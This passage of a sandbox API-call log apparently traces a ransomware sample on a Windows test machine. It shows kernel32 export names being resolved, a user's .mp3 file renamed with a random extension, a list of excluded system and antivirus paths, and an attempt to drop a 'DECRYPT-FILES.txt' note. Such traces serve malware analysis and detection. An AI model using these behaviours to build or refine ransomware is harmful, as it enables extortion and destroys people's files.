(lpString="CREATEMUTEXW") returned 12 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.980] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.980] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.980] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.980] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.980] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.980] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.980] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.980] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.981] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.981] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.981] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.981] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.981] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.981] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.981] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.981] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.981] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.981] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.981] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.981] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.981] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.981] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.981] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.981] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.981] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.981] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.981] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.982] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.982] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.982] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.982] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.982] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.982] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.982] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.982] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.982] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.982] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.982] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.982] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.982] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.982] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.982] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.982] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.982] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.982] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.982] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.982] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.983] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.983] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.983] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.983] lstrlenA (lpString="DELETEATOM") returned 10 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.983] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.983] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.983] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.983] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.983] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.983] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.983] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.983] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.983] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.983] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.983] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.984] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.984] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.984] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.984] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.984] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.984] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.984] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.984] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.984] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.984] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.984] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.985] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.985] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.985] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.985] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.985] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.985] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.985] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.985] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.985] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.985] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.985] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.985] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.985] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.985] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.985] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.985] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.985] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.985] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.985] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.986] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.986] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\zU XAhD6n QtktGAoqJg.mp3") returned 80 [0085.986] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\zU XAhD6n QtktGAoqJg.mp3.q6SYu") returned 86 [0085.986] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\zU XAhD6n QtktGAoqJg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\zu xahd6n qtktgaoqjg.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\zU XAhD6n QtktGAoqJg.mp3.q6SYu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\zu xahd6n qtktgaoqjg.mp3.q6syu"), dwFlags=0x0) returned 1 [0085.986] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.987] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.987] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.987] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4838c3d0, ftCreationTime.dwHighDateTime=0x1d4d36e, ftLastAccessTime.dwLowDateTime=0xbe691d10, ftLastAccessTime.dwHighDateTime=0x1d4d540, ftLastWriteTime.dwLowDateTime=0xbe691d10, ftLastWriteTime.dwHighDateTime=0x1d4d540, nFileSizeHigh=0x0, nFileSizeLow=0x38d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="zU XAhD6n QtktGAoqJg.mp3", cAlternateFileName="ZUXAHD~1.MP3")) returned 0 [0085.987] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0085.987] CloseHandle (hObject=0x410) returned 1 [0085.987] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0x9d129120, ftLastAccessTime.dwHighDateTime=0x1d4d51b, ftLastWriteTime.dwLowDateTime=0x9d129120, ftLastWriteTime.dwHighDateTime=0x1d4d51b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zUt2ThE-zNirRyoAwYp\\", cAlternateFileName="ZUT2TH~1")) returned 0 [0085.988] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0085.988] CloseHandle (hObject=0x430) returned 1 [0085.988] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0085.988] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0085.988] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0085.988] lstrcatW (in: lpString1="My Documents", lpString2="\\" | out: lpString1="My Documents\\") returned="My Documents\\" [0085.988] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="My Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\" [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\Program Files") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch=":\\Windows") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\Games\\") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\All Users") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="AhnLab") returned 0x0 [0085.988] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.988] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned 43 [0085.988] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.989] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\\\jkbimi8.tmp") returned 55 [0085.989] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0085.990] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned 43 [0085.990] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.990] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\\\DECRYPT-FILES.txt") returned 61 [0085.990] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.990] lstrlenW 